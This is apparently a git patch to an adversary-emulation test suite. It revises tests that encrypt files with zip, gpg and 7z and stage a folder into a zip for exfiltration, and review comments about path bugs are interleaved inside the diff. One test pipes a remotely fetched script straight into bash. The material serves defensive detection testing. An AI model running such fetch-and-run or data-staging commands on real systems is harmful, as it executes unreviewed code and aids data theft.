From 65d0f6dc5dd004d323ef0769b035fa843eb0e596 Mon Sep 17 00:00:00 2001
From: Andrew Beers
Date: Mon, 18 Nov 2019 07:28:44 -0800
Subject: [PATCH] Zip a folder with PowerShell (#640)
* add test to compress directory and delete it
* remove cleanup command sbecause I don't have a way to test them yet
* fix paths
* fix command misspelling
* zip into C drive
* fix paths to Temp finally
* move to data staging
---
 atomics/T1022/T1022.yaml | 10 +++++-----
 atomics/T1074/T1074.yaml | 15 ++++++++++++++-
 atomics/T1074/bin/Folder_to_encrypt/T1022.txt | 0
 3 files changed, 19 insertions(+), 6 deletions(-)
 create mode 100644 atomics/T1074/bin/Folder_to_encrypt/T1022.txt
diff --git a/atomics/T1022/T1022.yaml b/atomics/T1022/T1022.yaml
index ceb364ea..29e1343c 100644
--- a/atomics/T1022/T1022.yaml
+++ b/atomics/T1022/T1022.yaml
@@ -17,11 +17,11 @@ atomic_tests:
 elevation_required: false
 command: |
 echo "This file will be encrypted" > /tmp/victim-gpg.txt
- mkdir /tmp/victim-files
+ mkdir PathToAtomicsFolder/T1022/victim-files
 cd /tmp/victim-files
 touch a b c d e f g
- zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/*
- gpg -c /tmp/victim-gpg.txt
+ zip --password "insert password here" $PathToAtomicsFolder/victim-files.zip /tmp/victim-files/*
+ gpg -c $PathToAtomicsFolder/T1022/victim-gpg.txt
 ls -l
@@ -67,8 +67,8 @@ atomic_tests:
 name: command_prompt
 elevation_required: false
 command: |
- mkdir .\tmp\victim-files
- cd .\tmp\victim-files
+ mkdir $PathToAtomicsFolder\T1022\victim-files
+ cd $PathToAtomicsFolder\T1022\victim-files
 echo "This file will be encrypted" > .\encrypted_file.txt
 7z a archive.7z -pblue
 dir
diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index 23c47792..c666c8bc 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
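Review bot: The first T1022 hunk leaves the bash test internally inconsistent: `echo` still writes `/tmp/victim-gpg.txt` while the new `gpg -c $PathToAtomicsFolder/T1022/victim-gpg.txt` reads a file nothing created, and the new `mkdir PathToAtomicsFolder/T1022/victim-files` (no `$`, unlike the other new lines, so a plain shell treats it as a literal relative path) is followed by the unchanged `cd /tmp/victim-files` and a `zip` that still globs `/tmp/victim-files/*`. Whether the test harness textually replaces the bare token before execution is not visible in this patch; either way every step should point at the same directory, and as it stands the `cd`, `zip` and `gpg` steps fail or archive nothing. Suggested rewrite of the block scalar below; `touch` is kept as a placement line and `ls -l` is unchanged.
```yaml
      echo "This file will be encrypted" > $PathToAtomicsFolder/T1022/victim-gpg.txt
      mkdir $PathToAtomicsFolder/T1022/victim-files
      cd $PathToAtomicsFolder/T1022/victim-files
      touch a b c d e f g
      zip --password "insert password here" $PathToAtomicsFolder/T1022/victim-files.zip $PathToAtomicsFolder/T1022/victim-files/*
      gpg -c $PathToAtomicsFolder/T1022/victim-gpg.txt
```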
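Review bot: In the second T1022 hunk the `command_prompt` executor now runs `mkdir $PathToAtomicsFolder\T1022\victim-files` and `cd $PathToAtomicsFolder\T1022\victim-files`, but cmd.exe does not expand `$name` variables (it uses `%name%`), so unless the runner rewrites the token before handing the script to the shell these lines create and enter a literal `$PathToAtomicsFolder` directory under the current working directory. That substitution is not visible in this patch; if it is guaranteed, a sentence in the test's `description` saying that the path token is replaced by the harness would spare the next reader the same question, otherwise the two lines should use whatever form the other `command_prompt` tests in this file already use. The rest of the executor body (`echo`, `7z`, `dir`) is unchanged and the enclosing test definition starts above the hunk.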
@@ -27,4 +27,17 @@ atomic_tests:
 executor:
 name: bash
 command: |
- curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
\ No newline at end of file
+ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
+
+- name: Zip a Folder with PowerShell
+ description: |
+ use living off the land tools to encrypt and zip a file for exfiltration
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_encrypt -DestinationPath $env:TEMP\Folder_to_encrypt.zip
+ cleanup_command: |
+ Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip
diff --git a/atomics/T1074/bin/Folder_to_encrypt/T1022.txt b/atomics/T1074/bin/Folder_to_encrypt/T1022.txt
new file mode 100644
index 00000000..e69de29b
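Review bot: The new test's `description` promises to `encrypt and zip a file`, but the command is a single `Compress-Archive` call, which produces a plain, unencrypted zip of a folder; since these descriptions are what detection engineers use to decide which telemetry a test should produce, I'd change it to `Use the built-in Compress-Archive cmdlet to zip a folder into the user's TEMP directory, staging it for exfiltration; no encryption is applied.` (the `Folder_to_encrypt` directory name carries the same misleading hint). The test is also not re-runnable: `Compress-Archive` refuses to overwrite an existing `-DestinationPath`, so a second run after a failed cleanup errors out; add `-Force` to the cmdlet and make the cleanup tolerant with `Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip -ErrorAction Ignore`. The committed `Folder_to_encrypt/T1022.txt` is an empty blob, so the archive only exercises the zip-creation event and not any file-content behaviour, which is worth stating in the description as well.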